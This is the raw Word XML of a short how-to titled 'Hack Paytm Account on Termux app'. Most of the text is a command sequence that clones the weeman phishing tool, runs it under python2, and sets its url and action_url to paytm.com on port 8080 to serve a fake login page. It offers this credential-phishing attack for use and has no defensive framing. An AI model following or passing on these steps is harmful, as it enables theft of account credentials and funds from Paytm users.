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4E0" w:rsidRDefault="008D54E0">
      <w:r>
        <w:t xml:space="preserve">Hack Paytm Account on Termux app </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B7007" w:rsidRDefault="00CA333B">
      <w:r>
        <w:t xml:space="preserve"> download all command  following-:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B7007" w:rsidRDefault="008B7007"/>
    <w:p w:rsidR="002646EA" w:rsidRDefault="00A96662">
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="002646EA">
        <w:t xml:space="preserve">pt </w:t>
      </w:r>
      <w:r w:rsidR="00EB30E6">
        <w:t>update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB30E6" w:rsidRDefault="00A96662">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B7007">
        <w:t>pkg</w:t>
      </w:r>
      <w:r w:rsidR="00EB30E6">
        <w:t xml:space="preserve"> upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB30E6" w:rsidRDefault="00A96662">
      <w:r>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="00EB30E6">
        <w:t>kg install git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072090E" w:rsidRDefault="00A96662">
      <w:r>
        <w:t xml:space="preserve"> g</w:t>
      </w:r>
      <w:r w:rsidR="007D77AD">
        <w:t>it clone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D77AD" w:rsidRDefault="00A96662">
      <w:r>
        <w:t xml:space="preserve"> g</w:t>
      </w:r>
      <w:r w:rsidR="007D77AD">
        <w:t xml:space="preserve">it clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="002F2549" w:rsidRPr="001B58E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/evait-security/weeman</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002F2549" w:rsidRDefault="00A567C6">
      <w:r>
        <w:t xml:space="preserve"> ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005106EC" w:rsidRDefault="006A0077">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED4686">
        <w:t xml:space="preserve"> cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> weeman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0077" w:rsidRDefault="005106EC">
      <w:r>
        <w:t xml:space="preserve"> pkg install python2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4FF9" w:rsidRDefault="004B4FF9">
      <w:r>
        <w:t xml:space="preserve"> ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512A08" w:rsidRDefault="00512A08">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD56ED">
        <w:t>python2 weeman.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD56ED" w:rsidRDefault="005D4A93">
      <w:r>
        <w:t xml:space="preserve"> pkg install python2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4A93" w:rsidRDefault="003746C8">
      <w:r>
        <w:t xml:space="preserve"> ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003746C8" w:rsidRDefault="008467B6">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF360B">
        <w:t xml:space="preserve"> python2 weeman.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF360B" w:rsidRDefault="00D118C5">
      <w:r>
        <w:t xml:space="preserve"> set url </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00C01874" w:rsidRPr="001B58E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://paytm.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C01874" w:rsidRDefault="00494CD9">
      <w:r>
        <w:t xml:space="preserve"> set port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00494CD9" w:rsidRDefault="002F3922">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A025D1">
        <w:t>set action_</w:t>
      </w:r>
      <w:r w:rsidR="00AC4D8A">
        <w:t xml:space="preserve">url </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00AC4D8A" w:rsidRPr="001B58E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://paytm.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F5199" w:rsidRDefault="001A6290">
      <w:r>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6290" w:rsidRDefault="001A6290"/>
    <w:sectPr w:rsidR="001A6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EA"/>
    <w:rsid w:val="00011D6D"/>
    <w:rsid w:val="001A6290"/>
    <w:rsid w:val="001F5199"/>
    <w:rsid w:val="00200B6A"/>
    <w:rsid w:val="002646EA"/>
    <w:rsid w:val="002F2549"/>
    <w:rsid w:val="002F3922"/>
    <w:rsid w:val="00364401"/>
    <w:rsid w:val="003746C8"/>
    <w:rsid w:val="003B5400"/>
    <w:rsid w:val="00411729"/>
    <w:rsid w:val="00494CD9"/>
    <w:rsid w:val="004B4FF9"/>
    <w:rsid w:val="005106EC"/>
    <w:rsid w:val="00512A08"/>
    <w:rsid w:val="00535CA1"/>
    <w:rsid w:val="005D4A93"/>
    <w:rsid w:val="00675117"/>
    <w:rsid w:val="006A0077"/>
    <w:rsid w:val="0072090E"/>
    <w:rsid w:val="007A4953"/>
    <w:rsid w:val="007D77AD"/>
    <w:rsid w:val="008467B6"/>
    <w:rsid w:val="008B7007"/>
    <w:rsid w:val="008D54E0"/>
    <w:rsid w:val="00A025D1"/>
    <w:rsid w:val="00A567C6"/>
    <w:rsid w:val="00A96662"/>
    <w:rsid w:val="00AC4D8A"/>
    <w:rsid w:val="00B72710"/>
    <w:rsid w:val="00B77A16"/>
    <w:rsid w:val="00BF360B"/>
    <w:rsid w:val="00C01874"/>
    <w:rsid w:val="00C154BF"/>
    <w:rsid w:val="00CA333B"/>
    <w:rsid w:val="00D118C5"/>
    <w:rsid w:val="00EB30E6"/>
    <w:rsid w:val="00ED4686"/>
    <w:rsid w:val="00FD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6CB24"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BFB3CA16-157C-BC4C-832D-4E153228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aytm.com" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paytm.com" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/evait-security/weem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2020-08-07T05:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-07T05:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>